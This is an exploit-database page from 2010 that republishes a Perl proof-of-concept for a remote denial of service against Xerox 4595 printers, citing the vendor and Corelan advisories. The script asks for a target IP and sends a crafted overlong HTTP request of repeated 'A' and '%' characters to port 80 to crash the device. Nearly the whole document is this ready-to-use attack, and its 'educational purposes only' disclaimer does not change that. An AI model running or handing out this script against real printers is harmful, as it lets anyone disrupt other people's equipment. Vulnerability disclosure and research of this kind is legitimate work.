[dos / poc] - Xerox 4595 Denial of Service Vulnerability
Posted on 01 November 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Xerox 4595 Denial of Service Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Xerox 4595 Denial of Service Vulnerability by chap0 in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>========================================== Xerox 4595 Denial of Service Vulnerability ========================================== #!/usr/bin/perl # # Xerox 4595 Remote Dos # November 1, 2010 # By chap0 - The tongue has the power of life and death # [www.seek-truth.net][www.corelan.be:8800] # # Public Advisories # http://www.xerox.com/downloads/usa/en/c/cert_XRX10-004_v1.0.pdf # http://www.corelan.be:8800/advisories.php?id=CORELAN-10-065 # # Greets to Corelan Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided 'as is', without any warranty. Use for educational purposes only. # Do not use this code to do anything illegal! Corelan does not want anyone to use this script # for malicious and/or illegal purposes. Corelan cannot be held responsible for any illegal use. # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. use IO::Socket; my $head = "http://"; my $code = "x41" x 25; $code=$code."x25" x 4; $code=$code."x41" x 347; $code=$code.".htm"; print " Enter the IP of the Xerox 4595 to DoS: "; chomp ($ip = <STDIN>); my $dos = $head.$ip.$code; $sock = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => 80, Proto => "tcp" ); die "Check your connection: $! " unless $sock; print $sock "$dos "; close ($sock); print "Connect to $ip in a browser to see if the Dos was successful "; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-11-01]</pre></body></html>
